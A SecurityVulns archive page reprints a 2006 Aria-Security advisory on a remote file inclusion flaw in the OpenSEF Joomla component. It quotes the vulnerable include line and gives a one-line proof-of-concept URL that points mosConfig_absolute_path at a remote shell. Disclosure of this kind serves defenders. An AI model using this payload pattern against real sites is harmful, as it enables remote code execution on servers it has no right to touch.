Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  [SA21543] mail f/w system Mail Header Injection Vulnerability

  [SA21604] Drupal E-commerce Module Script Insertion Vulnerabilities

  [SA21603] Drupal Easylinks Module Script Insertion and SQL Injection

  [SA21584] Empire CMS "check_path"
File Inclusion Vulnerability

From:outlaw_(at)_aria-security.net <outlaw_(at)_aria-security.net>
Date:21 августа 2006 г.
Subject:Modification For OpenSEF Remote file Inclusion

               ##################################################################
#########################
               #                       Aria-Security.net Advisory                                        #
               #                       Discovered  by: O.U.T.L.A.W                                       #                     #                       < www.Aria-security.net >                                         #
               #               Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp                              #
               #                                                                                  
       #
               ##################################################################
#########################


#Software: OpenSEF
#Attack method: Remote File Inclusion
#Description : OpenSEF is a Joomla component that extends the built-in SEF (Search Engine Friendly)
#Source:
  
require_once( $mosConfig_absolute_path . '/includes/sef.php' );
 } else {
   // Joomla!'s SEF option is turned off; revert to Joomla!'s original-style
   //


*********************************************************************************
***

                                                                                 
        
#Proof of Concept:                                                                        
#http://www.site.com/sef.php?mosConfig_absolute_path=SHELL
#                                                         
#----------------------------------------------------------                               
#                                                                                  
                                                                                 
      
#                                                                                  
               
#Contact : [email protected]                                                       
                                                                                 
       

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород